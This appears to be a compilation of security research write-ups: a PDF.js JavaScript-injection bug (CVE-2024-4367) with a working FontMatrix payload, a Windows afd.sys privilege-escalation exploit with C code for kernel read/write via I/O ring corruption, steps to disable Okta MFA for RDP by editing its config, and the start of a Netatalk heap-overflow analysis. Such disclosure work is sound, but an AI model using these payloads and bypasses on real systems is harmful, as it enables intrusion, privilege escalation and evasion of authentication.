  /FontName /FooBarFont
  /FontFile 3 0 R
  /ItalicAngle 0
  /Flags 4
>>
endobj

3 0 obj
<<
  /Length 100
>>
... (actual binary font data) ...
endobj

The 

dict
 referenced by the code above refers to the 
Font
 object. Hence, we should be able to define a custom 
FontMatrix
 array like this:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
  /FontMatrix [1 2 3 4 5 6]   % <-----
>>
endobj

When attempting to do this it initially looks like this doesn’t work, as the 

transform
 operations in generated 
Function
 bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal 
FontMatrix
 definition, the PDF-specified value is authoritative as the 
fontMatrix
 value is not overwritten.

Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):

/FontMatrix [1 2 3 4 5 (foobar)]

And indeed, it is plainly inserted into the 

Function
 body!

c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

Exploitation and impact 

Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classical example triggering an alert, by first closing the 

c.transform(...)
 function, and making use of the trailing parenthesis:

/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]

The result is exactly as expected:

Exploitation of CVE-2024-4367

You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of 

window.origin
. Interestingly enough, this is not the 
file://
 path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin 
resource://pdf.js
. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary 
file://
 URLs. Additionally, the real path of the opened PDF file is stored in 
window.PDFViewerApplication.url
, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.

In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.

Mitigation 

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries like 

react-pdf
 have also released patched versions. Because some higher level PDF-related libraries statically embed PDF.js, we recommend recursively checking your 
node_modules
 folder for files called 
pdf.js
to be sure. Headless use-cases of PDF.js (e.g., on the server-side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this. It is also advised to update.

Additionally, a simple workaround is to set the PDF.js setting 

isEvalSupported
 to 
false
. This will disable the vulnerable code-path. If you have a strict content-security policy (disabling the use of 
eval
 and the 
Function
constructor), the vulnerability is also not reachable.

Timeline 

  • 2024-04-26 – vulnerability disclosed to Mozilla
  • 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
  • 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
  • 2024-05-20 – publication of this blogpost

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Original text by Valentina Palmiotti, co-authored by Ruben Boonen

‘Patch Tuesday, Exploit Wednesday’ is an old hacker adage that refers to the weaponization of vulnerabilities the day after monthly security patches become publicly available. As security improves and exploit mitigations become more sophisticated, the amount of research and development required to craft a weaponized exploit has increased. This is especially relevant for memory corruption vulnerabilities.

However, with the addition of new features (and memory-unsafe C code) in the Windows 11 kernel, ripe new attack surfaces can be introduced. By honing in on this newly introduced code, we demonstrate that vulnerabilities that can be trivially weaponized still occur frequently. In this blog post, we analyze and exploit a vulnerability in the Windows Ancillary Function Driver for Winsock, 

afd.sys
, for Local Privilege Escalation (LPE) on Windows 11. Though neither of us had any previous experience with this kernel module, we were able to diagnose, reproduce, and weaponize the vulnerability in about a day. You can find the exploit code here.

Patch Diff and Root Cause Analysis

Based on the details of CVE-2023-21768 published by the Microsoft Security Response Center (MSRC), the vulnerability exists within the Ancillary Function Driver (AFD), whose binary filename is 

afd.sys
. The AFD module is the kernel entry point for the Winsock API. Using this information, we analyzed the driver version from December 2022 and compared it to the version newly released in January 2023. These samples can be obtained individually from Winbindex without the time-consuming process of extracting changes from Microsoft patches. The two versions analyzed are shown below.

  • AFD.sys / Windows 11 22H2 / 10.0.22621.608 (December 2022)
  • AFD.sys / Windows 11 22H2 / 10.0.22621.1105 (January 2023)

Ghidra was used to create binary exports for both of these files so they could be compared in BinDiff. An overview of the matched functions is shown below.

Figure 2 — Binary comparison of AFD.sys

Only one function appeared to have been changed, 

afd!AfdNotifyRemoveIoCompletion
. This significantly sped up our analysis of the vulnerability. We then compared both of the functions. The screenshots below show the changed code pre- and post-patch when looking at the decompiled code in Binary Ninja.

Pre-patch, 

afd.sys version 10.0.22621.608
.

Figure 3 — afd!AfdNotifyRemoveIoCompletion pre-patch

Post-patch, 

afd.sys version 10.0.22621.1105
.

Figure 4 — afd!AfdNotifyRemoveIoCompletion post-patch

This change shown above is the only update to the identified function. Some quick analysis showed that a check is being performed based on 

<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode" target="_blank" rel="noreferrer noopener">PreviousMode</a>
. If 
PreviousMode
 is zero (indicating that the call originates from the kernel) a value is written to a pointer specified by a field in an unknown structure. If, on the other hand, 
PreviousMode
 is not zero then 
<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-probeforwrite" target="_blank" rel="noreferrer noopener">ProbeForWrite</a>
 is called to ensure that the pointer set out in the field is a valid address that resides within user mode.

This check is missing in the pre-patch version of the driver. Since the function has a specific switch statement for 

PreviousMode
, the assumption is that the developer intended to add this check but forgot (we all lack coffee sometimes !).

From this update, we can infer that an attacker can reach this code path with a controlled value at 

field_0x18
 of the unknown structure. If an attacker is able to populate this field with a kernel address, then it’s possible to create an arbitrary kernel Write-Where primitive. At this point, it is not clear what value is being written, but any value could potentially be used for a Local Privilege Escalation primitive.

The function prototype itself contains both the 

PreviousMode
 value and a pointer to the unknown structure as the first and third arguments respectively.

Figure 5 — afd!AfdNotifyRemoveIoCompletion function prototype

Reverse Engineering

We now know the location of the vulnerability, but not how to trigger the execution of the vulnerable code path. We’ll do some reverse engineering before beginning to work on a Proof-of-Concept (PoC).

First, the vulnerable function was cross-referenced to understand where and how it was used.

Figure 6 — afd!AfdNotifyRemoveIoCompletion cross-references

A single call to the vulnerable function is made in 

afd!AfdNotifySock
.

We repeat the process, looking for cross-references to 

AfdNotifySock
. We find no direct calls to the function, but its address appears above a table of function pointers named 
AfdIrpCallDispatch
.

Figure 7 — afd!AfdIrpCallDispatch

This table contains the dispatch routines for the AFD driver. Dispatch routines are used to handle requests from Win32 applications by calling 

<a href="https://learn.microsoft.com/en-us/windows/win32/api/ioapiset/nf-ioapiset-deviceiocontrol" target="_blank" rel="noreferrer noopener">DeviceIoControl</a>
. The control code for each function is found in 
AfdIoctlTable
.

However, the pointer above is not within the AfdIrpCallDispatch table as we expected. From Steven Vittitoe’s Recon talk slides, we discovered that there are actually two dispatch tables for AFD, the second being AfdImmediateCallDispatch. By calculating the distance between the start of this table and the location where the pointer to AfdNotifySock is stored, we can derive the index into AfdIoctlTable, which shows that the control code for the function is 0x12127.

Figure 8 — afd!AfdIoctlTable

It’s worth noting that it’s the last input/output control (IOCTL) code in the table, indicating that 

AfdNotifySock
 is likely a new dispatch function that has been recently added to the AFD driver.

At this point, we had a couple of options. We could reverse engineer the corresponding Winsock API in user space to better understand how the underlying kernel function was called, or reverse engineer the kernel code and call into it directly. We didn’t actually know which Winsock function corresponded to 

AfdNotifySock
, so we opted to do the latter.

We came across some code published by x86matthew that performs socket operations by calling into the AFD driver directly, forgoing the Winsock library. This is interesting from a stealth perspective, but for our purposes, it is a nice template to create a handle to a TCP socket to make IOCTL requests to the AFD driver. From there, we were able to reach the target function, as evidenced by reaching a breakpoint set in WinDbg while kernel debugging.

Figure 9 — afd!AfdNotifySock breakpoint
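To make this step concrete, here is a minimal sketch of reaching the dispatch routine from user mode. It takes a shortcut compared to the x86matthew approach: instead of opening \Device\Afd by hand, it reuses the handle behind an ordinary Winsock socket and sends the IOCTL with NtDeviceIoControlFile. The IOCTL_AFD_NOTIFYSOCK name is ours, derived from the 0x12127 value read out of AfdIoctlTable above, and whether an unconnected socket is enough to reach the function is an assumption.

/* Hedged sketch: poking afd!AfdNotifySock from user mode.
 * IOCTL_AFD_NOTIFYSOCK is our own name for the 0x12127 value found in
 * AfdIoctlTable; the 0x30-byte input is just 'A's at this stage. */
#include <winsock2.h>
#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

#define IOCTL_AFD_NOTIFYSOCK 0x12127

typedef NTSTATUS (NTAPI *NtDeviceIoControlFile_t)(
    HANDLE FileHandle, HANDLE Event, PVOID ApcRoutine, PVOID ApcContext,
    PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode,
    PVOID InputBuffer, ULONG InputBufferLength,
    PVOID OutputBuffer, ULONG OutputBufferLength);

int main(void)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    /* A socket handle is also a handle to \Device\Afd, so IOCTLs sent on it
     * end up in afd.sys dispatch routines. */
    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    NtDeviceIoControlFile_t NtDeviceIoControlFile_ =
        (NtDeviceIoControlFile_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtDeviceIoControlFile");

    unsigned char inbuf[0x30];
    memset(inbuf, 0x41, sizeof(inbuf));   /* structure probing: all 'A's */

    IO_STATUS_BLOCK iosb = { 0 };
    NTSTATUS status = NtDeviceIoControlFile_(
        (HANDLE)s, NULL, NULL, NULL, &iosb,
        IOCTL_AFD_NOTIFYSOCK, inbuf, sizeof(inbuf), NULL, 0);

    printf("AfdNotifySock IOCTL -> 0x%08lx\n", (unsigned long)status);
    return 0;
}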

Now, refer back to the function prototype for 

DeviceIoControl
, through which we call into the AFD driver from user space. One of the parameters, 
lpInBuffer
, is a user mode buffer. As mentioned in the previous section, the vulnerability occurs because the user is able to pass an unvalidated pointer to the driver within an unknown data structure. This structure is passed in directly from our user mode application via the lpInBuffer parameter. It’s passed into 
AfdNotifySock
 as the fourth parameter, and into 
AfdNotifyRemoveIoCompletion
 as the third parameter.

At this point, we don’t know how to populate the data in 

lpInBuffer
, which we’ll call 
AFD_NOTIFYSOCK_STRUCT
, in order to pass the checks required to reach the vulnerable code path in 
AfdNotifyRemoveIoCompletion
. The remainder of our reverse engineering process consisted of following the execution flow and examining how to reach the vulnerable code.

Let’s go through each of the checks.

The first check we encounter is at the beginning of 

AfdNotifySock
:

Figure 10 — afd!AfdNotifySock size check

This check tells us that the size of the 

AFD_NOTIFYSOCK_STRUCT
 should be equal to 
0x30
 bytes, otherwise the function fails with 
STATUS_INFO_LENGTH_MISMATCH
.

The next check validates values in various fields in our structure:

Figure 11 — afd!AfdNotifySock structure validation

At the time we didn’t know what any of the fields correspond to, so we pass in a 

0x30
 byte array filled with 
0x41
 bytes (
AAAAAAAAA...
).

The next check we encounter is after a call to 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obreferenceobjectbyhandle" target="_blank">ObReferenceObjectByHandle</a>
. This function takes the first field of our input structure as its first argument.

Figure 12 — afd!AfdNotifySock call nt!ObReferenceObjectByHandle

The call must return success in order to proceed to the correct code execution path, which means that we must pass in a valid handle to an 

IoCompletionObject
. There is no officially documented way to create an object of that type via Win32 API. However, after some searching, we found an undocumented NT function 
<a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtCreateIoCompletion.html" target="_blank" rel="noreferrer noopener">NtCreateIoCompletion</a>
 that did the job.
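For reference, a minimal sketch of creating such an object, assuming the NtCreateIoCompletion prototype documented on the page linked above (the access mask and concurrency value are arbitrary choices here):

/* Sketch: creating an IoCompletionObject via the undocumented
 * NtCreateIoCompletion, resolved from ntdll at runtime. */
#include <windows.h>
#include <winternl.h>
#include <stdio.h>

typedef NTSTATUS (NTAPI *NtCreateIoCompletion_t)(
    PHANDLE IoCompletionHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, ULONG NumberOfConcurrentThreads);

int main(void)
{
    NtCreateIoCompletion_t NtCreateIoCompletion_ =
        (NtCreateIoCompletion_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtCreateIoCompletion");

    HANDLE hIoCompletion = NULL;
    NTSTATUS status = NtCreateIoCompletion_(&hIoCompletion, GENERIC_ALL, NULL, 0);

    printf("NtCreateIoCompletion -> 0x%08lx, handle=%p\n",
           (unsigned long)status, hIoCompletion);
    return 0;
}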

Afterward, we reach a loop whose counter is one of the values from our struct:

Figure 13 — afd!AfdNotifySock loop

This loop checked a field from our structure to verify it contained a valid user mode pointer and copied data to it. The pointer is incremented after each iteration of the loop. We filled in the pointers with valid addresses and set the counter to 1. From here, we were able to finally reach the vulnerable function 

AfdNotifyRemoveIoCompletion
.

Figure 14 — afd!AfdNotifyRemoveIoCompletion call

Once inside 

AfdNotifyRemoveIoCompletion
, the first check is on another field in our structure. It must be non-zero. It’s then multiplied by 0x20 and passed into 
ProbeForWrite
 along with another field in our struct as the pointer parameter. From here we can fill in the struct further with a valid user mode pointer (
pData2
) and field 
dwLen = 1
 (so that the total size passed to 
ProbeForWrite
 equals 0x20), and the checks pass.

Figure 15 — afd!AfdNotifyRemoveIoCompletion field check

Finally, the last check to pass before reaching the target code is a call to 

IoRemoveIoCompletion
 which must return 0 (
STATUS_SUCCESS
).

This function will block until either:

  • A completion record becomes available for the 
    IoCompletionObject
     parameter
  • The timeout expires, which is passed in as a parameter of the function

We control the timeout value via our structure, but simply setting a timeout of 0 is not sufficient for the function to return success. In order for this function to return with no errors, there must be at least one completion record available. After some research, we found the undocumented function 

<a rel="noreferrer noopener" href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtSetIoCompletion.html" target="_blank">NtSetIoCompletion</a>
, which manually increments the I/O pending counter on an 
IoCompletionObject
. Calling this function on the 
IoCompletionObject
 we created earlier ensures that the call to 
IoRemoveIoCompletion
 returns 
STATUS_SUCCESS
.

Figure 16 — afd!AfdNotifyRemoveIoCompletion check return nt!IoRemoveIoCompletion
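Putting the observed checks together, the 0x30-byte input can be pictured roughly as below. The field names, ordering and padding are our guesses inferred from the checks (a handle first, a pointer for the copy loop, a pointer and a length for ProbeForWrite, a counter and a timeout); they are not a recovered definition.

/* Hypothetical view of the 0x30-byte AFD_NOTIFYSOCK_STRUCT; every field name
 * and offset here is an assumption based on the checks described above. */
#include <windows.h>

typedef struct _AFD_NOTIFYSOCK_STRUCT {
    HANDLE hIoCompletion;       /* checked by ObReferenceObjectByHandle          */
    void  *pCopyBuffer;         /* user pointer the copy loop writes to          */
    void  *pData2;              /* pointer handed to ProbeForWrite / the target  */
    unsigned int dwCounter;     /* loop counter, 1 in our PoC                    */
    unsigned int dwTimeout;     /* timeout passed down to IoRemoveIoCompletion   */
    unsigned int dwLen;         /* multiplied by 0x20 for the ProbeForWrite size */
    unsigned int unknown[3];    /* remaining bytes up to 0x30: unknown           */
} AFD_NOTIFYSOCK_STRUCT;        /* 0x30 bytes on x64 with this guess             */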

Triggering Arbitrary Write-Where

Now that we can reach the vulnerable code, we can fill the appropriate field in our structure with an arbitrary address to write to. The value that we write to the address comes from an integer whose pointer is passed into the call to IoRemoveIoCompletion. IoRemoveIoCompletion sets the value of this integer to the return value of a call to KeRemoveQueueEx.

Figure 17 — nt!KeRemoveQueueEx return value
Figure 18 — nt!KeRemoveQueueEx return use

In our proof of concept, this write value is always equal to 

0x1
. We speculated that the return value of 
KeRemoveQueueEx
 is the number of items removed from the queue, but did not investigate further. At this point, we had the primitive we needed and moved on to finishing the exploit chain. We later confirmed that this guess was correct, and the write value can be arbitrarily incremented by additional calls to 
NtSetIoCompletion
 on the 
IoCompletionObject
.
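
The prototype below is taken from the undocumented.ntinternals.net page linked above; the loop is a small sketch of that idea (how many records a single trigger actually consumes also depends on the count field passed in the input structure, so treat this as illustrative):

/* Sketch: queue n completion records so that the value written by the
 * trigger becomes n (our working assumption, confirmed experimentally). */
#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtSetIoCompletion_t)(
    HANDLE IoCompletionHandle, PVOID KeyContext, PVOID ApcContext,
    NTSTATUS CompletionStatus, ULONG_PTR CompletionInformation);

void queue_completions(HANDLE hIoCompletion, unsigned int n)
{
    NtSetIoCompletion_t NtSetIoCompletion_ =
        (NtSetIoCompletion_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtSetIoCompletion");

    for (unsigned int i = 0; i < n; i++)
        NtSetIoCompletion_(hIoCompletion, NULL, NULL, 0 /* STATUS_SUCCESS */, 0);
}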

LPE with IORING

With the ability to write a fixed value (0x1) at an arbitrary kernel address, we proceeded to turn this into a full arbitrary kernel Read/Write. Because this vulnerability affects the latest versions of Windows 11 (22H2), we chose to leverage a Windows I/O ring object corruption to create our primitive. Yarden Shafir has written a number of excellent posts on Windows I/O rings and also developed and disclosed the primitive that we leveraged in our exploit chain. As far as we are aware, this is the first instance where this primitive has been used in a public exploit.

When an I/O Ring is initialized by a user, two separate structures are created: one in user space and one in kernel space. These structures are shown below.

The kernel object maps to 

nt!_IORING_OBJECT
 and is shown below.

Figure 19 — nt!_IORING_OBJECT initialization

Note that the kernel object has two fields, 

RegBuffersCount
 and 
RegBuffers
, which are zeroed on initialization. The count indicates how many I/O operations can possibly be queued for the I/O ring. The other parameter is a pointer to a list of the currently queued operations.

On the user space side, when calling 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-createioring" target="_blank">kernelbase!CreateIoRing</a>
 you get back an I/O Ring handle on success. This handle is a pointer to an undocumented structure (HIORING). Our definition of this structure was obtained from the research done by Yarden Shafir.

typedef struct _HIORING {
    HANDLE handle;
    NT_IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
    PVOID RegBufferArray;
    ULONG BufferArraySize;
    PVOID Unknown;
    ULONG FileHandlesCount;
    ULONG SubQueueHead;
    ULONG SubQueueTail;
};

If a vulnerability, such as the one covered in this blog post, allows you to update the 

RegBuffersCount
 and 
RegBuffers
 fields, then it is possible to use standard I/O Ring APIs to read and write kernel memory.

As we saw above, we are able to use the vulnerability to write 

0x1
 at any kernel address that we like. To set up the I/O ring primitive we can simply trigger the vulnerability twice.

In the first trigger we set the 

RegBuffersCount
 to 
0x1
.

Figure 20 — nt!_IORING_OBJECT first time triggering the bug

And in the second trigger we set 

RegBuffers
 to an address that we can allocate in user space (like 
0x0000000100000000
).

Figure 21 — nt!_IORING_OBJECT second time triggering the bug
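To make the two triggers concrete, the sketch below wraps them behind a hypothetical trigger_afd_write_one() helper (standing in for the AfdNotifySock sequence described earlier) and assumes that the kernel address of the nt!_IORING_OBJECT has already been obtained by other means, e.g. a handle-address leak. The structure offsets are placeholders for the 22H2 build, and the idea that writing 0x1 into the high dword of RegBuffers yields 0x0000000100000000 is our reading of why that particular address is used.

/* Sketch: corrupting the I/O ring object with two constrained writes of 0x1.
 * trigger_afd_write_one() and the offsets below are assumptions, not the
 * published exploit interface. */
#include <windows.h>
#include <stdint.h>

#define IORING_REGBUFFERSCOUNT_OFFSET 0xb0   /* placeholder offset */
#define IORING_REGBUFFERS_OFFSET      0xb8   /* placeholder offset */
#define FAKE_REGBUFFERS ((LPVOID)0x0000000100000000ULL)

static void trigger_afd_write_one(uint64_t kernel_addr)
{
    /* Stub: in the real chain this runs the AfdNotifySock sequence from the
     * previous section so that IoRemoveIoCompletion stores 0x1 at kernel_addr. */
    (void)kernel_addr;
}

void corrupt_ioring(uint64_t ioring_kaddr)
{
    /* First trigger: RegBuffersCount = 1. */
    trigger_afd_write_one(ioring_kaddr + IORING_REGBUFFERSCOUNT_OFFSET);

    /* Back the fake registered-buffer array with real user memory at the
     * address the corrupted pointer will hold. */
    VirtualAlloc(FAKE_REGBUFFERS, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    /* Second trigger: presumably writing 0x1 into the high dword of the
     * RegBuffers pointer, turning it into 0x0000000100000000. */
    trigger_afd_write_one(ioring_kaddr + IORING_REGBUFFERS_OFFSET + 4);
}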

All that remains is to queue I/O operations by writing pointers to forged 

nt!_IOP_MC_BUFFER_ENTRY
 structures at the user space address (
0x100000000
). The number of entries should be equal to 
RegBuffersCount
. This process is highlighted in the diagram below.

Figure 22 — Setting up user space for I/O Ring kernel R/W primitive

One such 

nt!_IOP_MC_BUFFER_ENTRY
 is shown in the screenshot below. Note that the destination of the operation is a kernel address (
0xfffff8052831da20
) and that the size of the operation, in this case, is 
0x8
 bytes. It is not possible to tell from the structure if this is a read or write operation. The direction of the operation depends on which API was used to queue the I/O request. Using 
<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-buildioringreadfile" target="_blank">kernelbase!BuildIoRingReadFile</a>
 results in an arbitrary kernel write and 
kernelbase!BuildIoRingWriteFile
 results in an arbitrary kernel read.

Figure 23 — Example faked I/O Ring operation

To perform an arbitrary write, an I/O operation is tasked to read data from a file handle and write that data to a Kernel address.

Figure 24 — I/O Ring arbitrary write

Conversely, to perform an arbitrary read, an I/O operation is tasked to read data at a kernel address and write that data to a file handle.

Figure 25 – I/O Ring arbitrary read

Demo

With the primitive set up all that remains is using some standard kernel post-exploitation techniques to leak the token of an elevated process like System (PID 4) and overwrite the token of a different process.

Exploitation In the Wild

After the public release of our exploit code, Xiaoliang Liu (@flame36987044) from 360 Icesword Lab publicly disclosed for the first time that they had discovered a sample exploiting this vulnerability in the wild (ITW) earlier this year. The technique utilized by the ITW sample differed from ours. The attacker triggers the vulnerability using the corresponding Winsock API function, 

ProcessSocketNotifications
, instead of calling into the 
afd.sys
 driver directly, like in our exploit.  

The official statement from 360 Icesword Lab is as follows:  
 
“360 IceSword Lab focuses on APT detection and defense. Based on our 0day vulnerability radar system, we discovered an exploit sample of CVE-2023-21768 in the wild in January this year, which differs from the exploits announced by @chompie1337 and @FuzzySec in that it is exploited through system mechanisms and vulnerability features. The exploit is related to NtSetIoCompletion and ProcessSocketNotifications. ProcessSocketNotifications gets the number of times NtSetIoCompletion is called, so we use this to change the privilege count.”

Conclusion and Final Reflections

You may notice that in some parts of the reverse engineering our analysis is superficial. It’s sometimes helpful to only observe some relevant state changes and treat portions of the program as a black box, to avoid getting led down an irrelevant rabbit hole. This allowed us to turn around an exploit quickly, even though maximizing the completion speed was not our goal.

Additionally, we conducted a patch diffing review of all the reported vulnerabilities in 

afd.sys
 indicated as “Exploitation More Likely”. Our review revealed that all except two of the vulnerabilities were a result of improper validation of pointers passed in from user mode. This shows that having historical knowledge of past vulnerabilities, particularly within a specific target, can be fruitful for finding new vulnerabilities. When the code base is expanded, the same mistakes are likely to be repeated. Remember, new C code == new bugs. As evidenced by the discovery of the aforementioned vulnerability being exploited in the wild, it is safe to say that attackers are closely monitoring new code base additions as well.

The lack of support for Supervisor Mode Access Protection (SMAP) in the Windows kernel leaves us with plentiful options to construct new data-only exploit primitives. These primitives aren’t feasible in other operating systems that support SMAP. For example, consider CVE-2021-41073, a vulnerability in Linux’s implementation of I/O Ring pre-registered buffers, (the same feature we abuse in Windows for a R/W primitive). This vulnerability can allow overwriting a kernel pointer for a registered buffer, but it cannot be used to construct an arbitrary R/W primitive because if the pointer is replaced with a user pointer, and the kernel tries to read or write there, the system will crash.

Despite best efforts by Microsoft to kill beloved exploit primitives, there are bound to be new primitives to be discovered that take their place. We were able to exploit the latest version of Windows 11 22H2 without encountering any mitigations or constraints from Virtualization Based Security features such as HVCI.

Bypassing Okta MFA Credential Provider for Windows

Bypassing Okta MFA Credential Provider for Windows

Original text by n00py

I’ll state this upfront, so as not to confuse: this is a post-exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.

Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop Protocol (RDP) clients. Using Okta MFA Credential Provider for Windows, RDP clients (Windows workstations and servers) are prompted for MFA when accessing supported domain joined Windows machines and servers.

– https://help.okta.com/en-us/Content/Topics/Security/proc-mfa-win-creds-rdp.htm

This is going to be very similar to my other post about Bypassing Duo Two-Factor Authentication. I’d recommend reading that first to provide context to this post.

The biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making that configuration less likely. It also does not have “RDP Only” as the default, making the console bypass less likely to be successful.

With that said, if you do have administrator level shell access, it is quite simple to disable.

For Okta, the configuration is not stored in the registry like Duo’s, but in a configuration file located at:

 C:\Program Files\Okta\Okta Windows Credential Provider\config\rdp_app_config.json

There are two things you need to do:

  • Modify the InternetFailOpenOption value to true
  • Change the Url value to something that will not resolve.

After that, attempts to RDP will not prompt Okta MFA.

It is of course always possible to uninstall the software as an admin, but ideally we want to achieve our objective with the least intrusive means possible. These configuration files can easily be flipped back when you are done.

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

Original text by Etienne Helluy-Lafont , Luca Moro  Exploit — Download

Vulnerability details and analysis

ENVIRONMENT

The Western Digital MyCloudHome is a consumer grade NAS with local network and cloud based functionalities. At the time of the contest (firmware 7.15.1-101) the device ran a custom Android distribution on an armv8l CPU. It exposed a few custom services and integrated some open source ones such as the Netatalk daemon. This service was a prime target to compromise the device because it was running with root privileges and was reachable from the adjacent network. We will not discuss the initial surface discovery here in order to focus on the vulnerability. Instead, we provide a detailed analysis of the vulnerability and how we exploited it.

Netatalk [2] is a free and Open Source [3] implementation of the Apple Filing Protocol (AFP) file server. This protocol is used in networked macOS environments to share files between devices. Netatalk is distributed via the service afpd, also available on many Linux distributions and devices. So the work presented in this article should also apply to other systems.
Western Digital modified the sources a bit to accommodate the Android environment [4], but their changes are not relevant for this article so we will refer to the official sources.

AFP data is carried over the Data Stream Interface (DSI) protocol [5]. The exploited vulnerability lies in the DSI layer, which is reachable without any form of authentication.

OVERVIEW OF SERVER IMPLEMENTATION

The DSI layer

The server is implemented as a usual fork server with a parent process listening on the TCP port 548 and forking into new children to handle client sessions. The protocol exchanges different packets encapsulated by Data Stream Interface (DSI) headers of 16 bytes.

#define DSI_BLOCKSIZ 16
struct dsi_block {
    uint8_t dsi_flags;       /* packet type: request or reply */
    uint8_t dsi_command;     /* command */
    uint16_t dsi_requestID;  /* request ID */
    union {
        uint32_t dsi_code;   /* error code */
        uint32_t dsi_doff;   /* data offset */
    } dsi_data;
    uint32_t dsi_len;        /* total data length */
    uint32_t dsi_reserved;   /* reserved field */
};

A request is usually followed by a payload whose length is specified by the 

dsi_len
 field.

The meaning of the payload depends on what 

dsi_command
 is used. A session should start with the 
dsi_command
 byte set as 
DSIOpenSession (4)
. This is usually followed up by various 
DSICommand (2)
 to access more functionalities of the file share. In that case the first byte of the payload is an AFP command number specifying the requested operation.

dsi_requestID
 is an id that should be unique for each request, giving the chance for the server to detect duplicated commands.
As we will see later, Netatalk implements a replay cache based on this id to avoid executing a command twice.

It is also worth mentioning that the AFP protocol supports different schemes of authentication as well as anonymous connections.
But this is out of the scope of this write-up as the vulnerability is located in the DSI layer, before AFP authentication.

Few notes about the server implementation

The DSI struct

To manage a client in a child process, the daemon uses a 

DSI *dsi
 struct. This represents the current connection, with its buffers and it is passed into most of the Netatalk functions. Here is the struct definition with some members edited out for the sake of clarity:

#define DSI_DATASIZ       65536

/* child and parent processes might interpret a couple of these
 * differently. */
typedef struct DSI {
    /* ... */
    struct dsi_block        header;
    /* ... */
    uint8_t  *commands;            /* DSI receive buffer */
    uint8_t  data[DSI_DATASIZ];    /* DSI reply buffer */
    size_t   datalen, cmdlen;
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI read ahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

We mainly see that the struct has:

  • The command heap buffer used for receiving the user input, initialized in dsi_init_buffer() with a default size of 1MB;
  • cmdlen to specify the size of the input in command;
  • An inlined data buffer of 64KB used for the reply;
  • datalen to specify the size of the output in data;
  • A read ahead heap buffer managed by the pointers buffer, start, eof and end, with a default size of 12MB, also initialized in dsi_init_buffer().

 

The main loop flow

After receiving 

DSIOpenSession
 command, the child process enters the main loop in 
afp_over_dsi()
. This function dispatches incoming commands until the end of the communication. Its simplified code is the following:

void afp_over_dsi(AFPObj *obj)
{
    DSI *dsi = (DSI *) obj->dsi;
    /* ... */
    /* get stuck here until the end */
    while (1) {
        /* ... */
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        /* ... */

        switch(cmd) {
        case DSIFUNC_CLOSE:
